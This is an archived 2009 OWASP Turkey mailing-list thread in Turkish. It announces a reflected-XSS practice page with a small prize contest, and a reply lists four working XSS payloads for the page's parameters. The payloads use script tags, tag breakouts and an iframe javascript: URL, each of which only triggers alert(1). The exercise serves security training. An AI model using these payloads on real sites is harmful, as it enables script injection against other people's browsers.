[Owasp-turkey] Reflected XSS Oyun Grubu ve Yarisma

E. Erdem e2erdem at gmail.com
Mon Jun 15 08:50:56 EDT 2009


Benden 4 tane (sadece FF3'te test edebildim. Tarayicilar bu konusunda
bir sey soylenmemis):

1- http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert(1)%3C%2FSCRIPT%3E%22%3E&vector2=&vector3=&vector4=&vector5=&vector6=&vector7=
2- http://www.webguvenligi.org/xsstb/reflected.php?vector1=&vector2=<IMG+"""><SCRIPT>alert(1)<%2FSCRIPT>">&vector3=&vector4=&vector5=&vector6=&vector7=
4- http://www.webguvenligi.org/xsstb/reflected.php?vector1=&vector2=&vector3=&vector4=--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(49))%3C%2FSCRIPT%3E&vector5=&vector6=&vector7=
5- http://www.webguvenligi.org/xsstb/reflected.php?vector1=&vector2=&vector3=&vector4=&vector5=%3CIFRAME+SRC%3D%22javascript%3Aalert(1)%3B%22%3E%3C%2FIFRAME%3E&vector6=&vector7=

2009/6/15 Bedirhan Urgun <bedirhanurgun at gmail.com>:
> Merhaba,
> Farklı Reflected XSS tekniklerini öğrenip uygulayabileceğiniz bir
> "oyun grubu" uygulamasına http://www.webguvenligi.org/xsstb/reflected.php
> erişebilirsiniz.
> Uygulamada 7 parametreye (vector1, vector2, ..., vector7) uygulanabilecek
> xss saldiri vektorleri var. Bu vektorleri exploit ederek, bu maile reply-all
> olarak asagida verdigim link gibi gonderen ilk iki kisye;
>
> 1inciye Maldivler'e 2 kisilik 7 gun 7 gece seyehat
> 2inciye Son model araba
>
> Yok daha neler!...
>
> 1inciye OWASP Membership T-Shirt'u (L)
> 2inciye OWASP Membership DVD'si
>
> gonderecegim.
>
> Ornek; (birinci tuyo benden)
> http://www.webguvenligi.org/xsstb/reflected.php?vector1=%3Cscript%3Ealert(1)%3C/script%3E
>
>
> Not 1: ekrana alert kutucugu icionde 1 yazdirmak yeterli
> Not 2: onemli olan owasp-tr mail arsivlerine dusme sirasi
> Not 3: en son yazdigim hediyeler gecerli! sonra "vay ben gormedim" olmasin
>
> Proje Post'u:
> http://www.webguvenligi.org/projeler/reflected-xss-oyun-grubu.html
> --
> Bedirhan Urgun
> http://www.webguvenligi.org
> http://www.owasp.org/index.php/Turkey
>
> Türkçe Web Uygulama Güvenliği E-Posta Listesine üye olmak için:
> https://lists.owasp.org/mailman/listinfo/owasp-turkey
>
> _______________________________________________
> Owasp-turkey mailing list
> Owasp-turkey at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-turkey
>
>


More information about the Owasp-turkey mailing list